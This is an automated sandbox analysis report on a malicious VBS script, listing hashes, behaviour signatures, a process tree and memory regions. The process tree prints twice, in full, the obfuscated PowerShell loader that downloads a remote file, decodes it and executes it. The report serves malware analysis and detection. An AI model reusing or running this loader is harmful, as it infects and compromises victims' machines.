Resubmissions

23-02-2024 03:45

240223-ea6qpsaf9t 10

23-02-2024 02:03

240223-cg4htahg5x 10

Analysis

  • max time kernel
    121s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-02-2024 02:03

General

  • Target

    00decd06732fecef7a4c6db953d90a9fc76b9ad9ed2b8e183a07a365c45254c0.vbs

  • Size

    9KB

  • MD5

    d2a2d34acb027afc3b36960d398a909f

  • SHA1

    60c7adcd3ca1831961635409e1ede4c7a088c105

  • SHA256

    00decd06732fecef7a4c6db953d90a9fc76b9ad9ed2b8e183a07a365c45254c0

  • SHA512

    2ae8d75ac7d37716c8ae6a56043011490c8d60270056f8b55ed7048d996c90c0155572fd22d8a7f96de9760a200e24886a3c27265cedc0ffd4fe670c97eb0934

  • SSDEEP

    192:JtzOv8hyM8vUkovNuW2UOLoP8wb4+bgvp9IaNWXNkYpN:vKv8MJvtoVuWdOy8wZgvQaNWXNkc

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\00decd06732fecef7a4c6db953d90a9fc76b9ad9ed2b8e183a07a365c45254c0.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pendr='Jolters:\Opno164';Set-Content $Pendr 'factoria';$rangdoo=Test-Path $Pendr;if($rangdoo){exit};function Knudesa9 ($antirac){For($Cele=4; $Cele -lt $antirac.Length-1; $Cele+=5){$Skelstnin=$Skelstnin+$antirac.'Substring'($Cele, 1)};$Skelstnin;}$Electrofi=Knudesa9 'PhanhNorttParatPriepFord:Manu/Spot/Zoopr Airo TilwdragtJacoeHviscJoachWagweKamfqsprnuCatai Korp RavmentieSupenColot Caus For.KildcEpizopeppmKabe/BrisiDownzAuto/StunCSkisoOutclUncomStonatoplnTiloh Rap.SalapKetufNummbAjos ';$Skelstnin01=Knudesa9 'IndtiBrane GgexKart ';$Pectosa = Knudesa9 'Over\HyppsAucayHovesBlkhwMangoInnewTrus6Trik4Dead\AlmeWrivniBradn FamdStrioAlanwCostsBookPGeneoEgolwKopie SigrSbesSRdehhTalieHemelLabolSneu\ BirvTabe1Prov.Perc0 Rig\RamepCritoLegew Sone UdmrdisksNsevhMixueVindlEkspl Are.KlereRemix BofeTrav ';&($Skelstnin01) (Knudesa9 'Tran$ MooJPletoTherlgroutedmoeIagtrIslasAcal2 afl=Over$Bloke ErhnAdelvEffe:SikkwFiduiGhennSkeldCycliDecorStan ') ;&($Skelstnin01) (Knudesa9 'Odes$TepePPraee dkscIntetCento ComspapiaKred=Symb$FletJFiduoZooplLizatVideeKongrNeddsBiml2Syva+Myco$HoriPSluteBlehc MustSandoAnfrsBreda Spl ') ;&($Skelstnin01) (Knudesa9 'Free$InevPAulor Trui ShinKdebsCrimg Scoe Morm Staa Boh Subh= Ori hjre(Tven( TragJukew LufmFjlliForm AntiwVindiTrlanAbst3Hyst2Nomb_Realp ThirAfstoFibec KaseSkrisHapasOver Swal-StivF Bio IndtPLsgnrBebyoraglcChifeBaans Tyvs LsnI ThodUnde=Fred$Tegn{PerrPafveIForbDSali}Pphb)Hete. ChoCYearoEvenmSubmmBawlaSeisnProtd BruL SkuiLabenSleeeHerp) Jul Vaci-SeedsBanepFlsklCouliOvertEnve Tast[Krakc ConhNappaBkforPoor]Firm3Meca4Stea ');&($Skelstnin01) (Knudesa9 'Germ$TourNSprnoGurkn NytcArch Vert=Kino Road$PoliPSayor HemiFejlnJerns StagSpeceThiemAcriaOper[Stat$ EncPPassr CraitaalndetesPrlugnyskeMotimRetraKont. AkrcPyraoSlugu KonnBrentKred-Indu2Biha] Rib ');&($Skelstnin01) (Knudesa9 'Nati$MastT OvevStara Unan Vergresbs ForfSoluj TrketarirAntr= Rad(StyrTRobee TersFasct Spi-DracPGummaecontudsah Abs erhe$ OvePmodseRettcsolatfaktoIndss Skiabypr)Skra Cock-FljtAMaggnLookdMaka Snke(Deli[KridITiinnStretSubdPMusitagerrFors]Slak:Hebr:TribsParaiMdrezDatae Slg Impr-Licieborgqnonp Stra8Haar) Ilk ') ;if ($Tvangsfjer) {&$Pectosa $Nonc;} else {;$Skelstnin00=Knudesa9 'IncoSIrnat BloaLagerAndet Udv-StryBUndeiFlagt OphsStevTFranrEleca EllnBiotsPitcfBenge SamrIndw Oate-VallS TngoSealuFedtrTvancMandeadyn Mili$SeksEGastlGonyeAtomcMilltAfkrrNoncoHivef Undi Fri Kak-HyleDdagte RotsfremtmassiSlvrn ThyaAntit KulinonaoVoyenDisp Tryk$JaloJGlyoo PnelCholttremeIdolrSprisBade2jess ';&($Skelstnin01) (Knudesa9 'Udea$SubdJLufto KnylThratSolseHavfrSydvs Hjl2Kare=Ligk$AntheRefenForvvAnil:autoaPylopSofap AfhdChonaRiset ForaPlot ') ;&($Skelstnin01) (Knudesa9 'AsceISeermFletpMoraoVeder Pret Exo-HerrM PeroArred husuAmorlHjere Oop PhysB SagiunsmtPamfsPresT MejrUnreaUdsmnKopisDefif vove FinrSymb ') ;$Jolters2=$Jolters2+'\Wheelhous.Spu';while (-not $Foxwoo) {&($Skelstnin01) (Knudesa9 'Aust$ nutF OutoKernxNatuw EyeoInteoRive=Klyn( UnsTAutoeLustsStegtWien-AtalPUrawa BeltReinhUnev Dip$IndeJunsloAbbelGenftKaryeUnferLeves Ret2Adam)Bagt ') ;&($Skelstnin01) $Skelstnin00;&($Skelstnin01) (Knudesa9 'RentSMetat Pana MerrUddatHjor-BillSKjeslPetre CapeDiffpFilm Misk5Udkm ');}&($Skelstnin01) (Knudesa9 'Halv$UnemKAkkonModeuIndhd FlueGalgsHeliaPilc Afhn=Ggek decGcatae LuftBoce-SammCStorooutwnSupetSurneVidenTipbtYtri Char$IsolJCamboPedilPoletMaese Rinr jossSwin2Mass ');&($Skelstnin01) (Knudesa9 ' Pre$IwarEPlymxRecotpseurHmsk Fiel=Insa Elli[ AriSUdeay fups StdtForbePetimVels.HarmCYdero DevnBuffv RemeSynor anstTeth]Vkst:Capo: eleFRebar PaloSubem ResBSeiraLegisDomse Uds6Over4GumpSEjentFellrOveriUnpunNdveg Lib(None$tappKSyndnTurcuAngldAnsveVings BesaPing)bord ');&($Skelstnin01) (Knudesa9 'Plex$HvidSMellkBogreSovjl SkrsBredtHavenAniliSatunImpl2Supe Acco=Besl Klor[HamsSNoneyBanasSynatUnoveStewmVare. SynTAmareDechxThertCouc.NarkESnusnBegycReatoNavidThrei GalnHeatgPakh]Klok:Felt:JordAConnSFebeC SkoIPlanIfras.WharGTindeHoratcercSPaputInver PaciRvesnSlidg For(Alas$KenoEtoffxLenit GrorUnde)Unde ');&($Skelstnin01) (Knudesa9 ' enc$CancCCulvrKontiPleicRancoPuniaBeldr Bluy brutOrieeHolb=Vory$MyriSVitakteraeGarilEndesRntgtOrphnInseiAssynEnto2Bevi.Slngs PrauResobTejss FrstFordrWholiOvernWeedgRegl( Pil3Agte2Inkl7Brem4 unf7 Com9 jvn,Kegl2 Aso8Smyk5Isin1Pere8Soph)Hers ');&($Skelstnin01) $Cricoaryte;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Pendr='Jolters:\Opno164';Set-Content $Pendr 'factoria';$rangdoo=Test-Path $Pendr;if($rangdoo){exit};function Knudesa9 ($antirac){For($Cele=4; $Cele -lt $antirac.Length-1; $Cele+=5){$Skelstnin=$Skelstnin+$antirac.'Substring'($Cele, 1)};$Skelstnin;}$Electrofi=Knudesa9 'PhanhNorttParatPriepFord:Manu/Spot/Zoopr Airo TilwdragtJacoeHviscJoachWagweKamfqsprnuCatai Korp RavmentieSupenColot Caus For.KildcEpizopeppmKabe/BrisiDownzAuto/StunCSkisoOutclUncomStonatoplnTiloh Rap.SalapKetufNummbAjos ';$Skelstnin01=Knudesa9 'IndtiBrane GgexKart ';$Pectosa = Knudesa9 'Over\HyppsAucayHovesBlkhwMangoInnewTrus6Trik4Dead\AlmeWrivniBradn FamdStrioAlanwCostsBookPGeneoEgolwKopie SigrSbesSRdehhTalieHemelLabolSneu\ BirvTabe1Prov.Perc0 Rig\RamepCritoLegew Sone UdmrdisksNsevhMixueVindlEkspl Are.KlereRemix BofeTrav ';&($Skelstnin01) (Knudesa9 'Tran$ MooJPletoTherlgroutedmoeIagtrIslasAcal2 afl=Over$Bloke ErhnAdelvEffe:SikkwFiduiGhennSkeldCycliDecorStan ') ;&($Skelstnin01) (Knudesa9 'Odes$TepePPraee dkscIntetCento ComspapiaKred=Symb$FletJFiduoZooplLizatVideeKongrNeddsBiml2Syva+Myco$HoriPSluteBlehc MustSandoAnfrsBreda Spl ') ;&($Skelstnin01) (Knudesa9 'Free$InevPAulor Trui ShinKdebsCrimg Scoe Morm Staa Boh Subh= Ori hjre(Tven( TragJukew LufmFjlliForm AntiwVindiTrlanAbst3Hyst2Nomb_Realp ThirAfstoFibec KaseSkrisHapasOver Swal-StivF Bio IndtPLsgnrBebyoraglcChifeBaans Tyvs LsnI ThodUnde=Fred$Tegn{PerrPafveIForbDSali}Pphb)Hete. ChoCYearoEvenmSubmmBawlaSeisnProtd BruL SkuiLabenSleeeHerp) Jul Vaci-SeedsBanepFlsklCouliOvertEnve Tast[Krakc ConhNappaBkforPoor]Firm3Meca4Stea ');&($Skelstnin01) (Knudesa9 'Germ$TourNSprnoGurkn NytcArch Vert=Kino Road$PoliPSayor HemiFejlnJerns StagSpeceThiemAcriaOper[Stat$ EncPPassr CraitaalndetesPrlugnyskeMotimRetraKont. AkrcPyraoSlugu KonnBrentKred-Indu2Biha] Rib ');&($Skelstnin01) (Knudesa9 'Nati$MastT OvevStara Unan Vergresbs ForfSoluj TrketarirAntr= Rad(StyrTRobee TersFasct Spi-DracPGummaecontudsah Abs erhe$ OvePmodseRettcsolatfaktoIndss Skiabypr)Skra Cock-FljtAMaggnLookdMaka Snke(Deli[KridITiinnStretSubdPMusitagerrFors]Slak:Hebr:TribsParaiMdrezDatae Slg Impr-Licieborgqnonp Stra8Haar) Ilk ') ;if ($Tvangsfjer) {&$Pectosa $Nonc;} else {;$Skelstnin00=Knudesa9 'IncoSIrnat BloaLagerAndet Udv-StryBUndeiFlagt OphsStevTFranrEleca EllnBiotsPitcfBenge SamrIndw Oate-VallS TngoSealuFedtrTvancMandeadyn Mili$SeksEGastlGonyeAtomcMilltAfkrrNoncoHivef Undi Fri Kak-HyleDdagte RotsfremtmassiSlvrn ThyaAntit KulinonaoVoyenDisp Tryk$JaloJGlyoo PnelCholttremeIdolrSprisBade2jess ';&($Skelstnin01) (Knudesa9 'Udea$SubdJLufto KnylThratSolseHavfrSydvs Hjl2Kare=Ligk$AntheRefenForvvAnil:autoaPylopSofap AfhdChonaRiset ForaPlot ') ;&($Skelstnin01) (Knudesa9 'AsceISeermFletpMoraoVeder Pret Exo-HerrM PeroArred husuAmorlHjere Oop PhysB SagiunsmtPamfsPresT MejrUnreaUdsmnKopisDefif vove FinrSymb ') ;$Jolters2=$Jolters2+'\Wheelhous.Spu';while (-not $Foxwoo) {&($Skelstnin01) (Knudesa9 'Aust$ nutF OutoKernxNatuw EyeoInteoRive=Klyn( UnsTAutoeLustsStegtWien-AtalPUrawa BeltReinhUnev Dip$IndeJunsloAbbelGenftKaryeUnferLeves Ret2Adam)Bagt ') ;&($Skelstnin01) $Skelstnin00;&($Skelstnin01) (Knudesa9 'RentSMetat Pana MerrUddatHjor-BillSKjeslPetre CapeDiffpFilm Misk5Udkm ');}&($Skelstnin01) (Knudesa9 'Halv$UnemKAkkonModeuIndhd FlueGalgsHeliaPilc Afhn=Ggek decGcatae LuftBoce-SammCStorooutwnSupetSurneVidenTipbtYtri Char$IsolJCamboPedilPoletMaese Rinr jossSwin2Mass ');&($Skelstnin01) (Knudesa9 ' Pre$IwarEPlymxRecotpseurHmsk Fiel=Insa Elli[ AriSUdeay fups StdtForbePetimVels.HarmCYdero DevnBuffv RemeSynor anstTeth]Vkst:Capo: eleFRebar PaloSubem ResBSeiraLegisDomse Uds6Over4GumpSEjentFellrOveriUnpunNdveg Lib(None$tappKSyndnTurcuAngldAnsveVings BesaPing)bord ');&($Skelstnin01) (Knudesa9 'Plex$HvidSMellkBogreSovjl SkrsBredtHavenAniliSatunImpl2Supe Acco=Besl Klor[HamsSNoneyBanasSynatUnoveStewmVare. SynTAmareDechxThertCouc.NarkESnusnBegycReatoNavidThrei GalnHeatgPakh]Klok:Felt:JordAConnSFebeC SkoIPlanIfras.WharGTindeHoratcercSPaputInver PaciRvesnSlidg For(Alas$KenoEtoffxLenit GrorUnde)Unde ');&($Skelstnin01) (Knudesa9 ' enc$CancCCulvrKontiPleicRancoPuniaBeldr Bluy brutOrieeHolb=Vory$MyriSVitakteraeGarilEndesRntgtOrphnInseiAssynEnto2Bevi.Slngs PrauResobTejss FrstFordrWholiOvernWeedgRegl( Pil3Agte2Inkl7Brem4 unf7 Com9 jvn,Kegl2 Aso8Smyk5Isin1Pere8Soph)Hers ');&($Skelstnin01) $Cricoaryte;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2672

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PHOLXWWSE5WES2195YO5.temp
    Filesize

    7KB

    MD5

    98209afd26dc599f1d98b9186eb844fc

    SHA1

    e4e2a7f79bfc140a8dc86835e3d3941c993be842

    SHA256

    db5aa68b856d1a7d27a4180b5d6e5db9fb829c11fe7589b285eff445a6dc8609

    SHA512

    ca272f419c4f900a9cf3913807062fa7450dd22eb914bf7194a1d50de71ba22c141c55f019ba5e4f5f79a8f7d40d59c0131d42ee731e8d43f1e2a713ab81314f

  • memory/2548-29-0x0000000002910000-0x0000000002990000-memory.dmp
    Filesize

    512KB

  • memory/2548-9-0x0000000002910000-0x0000000002990000-memory.dmp
    Filesize

    512KB

  • memory/2548-32-0x0000000002910000-0x0000000002990000-memory.dmp
    Filesize

    512KB

  • memory/2548-31-0x0000000002910000-0x0000000002990000-memory.dmp
    Filesize

    512KB

  • memory/2548-30-0x0000000002910000-0x0000000002990000-memory.dmp
    Filesize

    512KB

  • memory/2548-10-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp
    Filesize

    9.6MB

  • memory/2548-11-0x0000000002910000-0x0000000002990000-memory.dmp
    Filesize

    512KB

  • memory/2548-6-0x0000000002910000-0x0000000002990000-memory.dmp
    Filesize

    512KB

  • memory/2548-7-0x00000000022A0000-0x00000000022A8000-memory.dmp
    Filesize

    32KB

  • memory/2548-28-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp
    Filesize

    9.6MB

  • memory/2548-4-0x000000001B2F0000-0x000000001B5D2000-memory.dmp
    Filesize

    2.9MB

  • memory/2548-5-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp
    Filesize

    9.6MB

  • memory/2548-8-0x0000000002910000-0x0000000002990000-memory.dmp
    Filesize

    512KB

  • memory/2672-17-0x00000000025E0000-0x0000000002620000-memory.dmp
    Filesize

    256KB

  • memory/2672-14-0x0000000073810000-0x0000000073DBB000-memory.dmp
    Filesize

    5.7MB

  • memory/2672-16-0x00000000025E0000-0x0000000002620000-memory.dmp
    Filesize

    256KB

  • memory/2672-15-0x0000000073810000-0x0000000073DBB000-memory.dmp
    Filesize

    5.7MB

  • memory/2672-18-0x00000000025E0000-0x0000000002620000-memory.dmp
    Filesize

    256KB

  • memory/2672-33-0x0000000073810000-0x0000000073DBB000-memory.dmp
    Filesize

    5.7MB

  • memory/2672-34-0x0000000073810000-0x0000000073DBB000-memory.dmp
    Filesize

    5.7MB

  • memory/2672-35-0x00000000025E0000-0x0000000002620000-memory.dmp
    Filesize

    256KB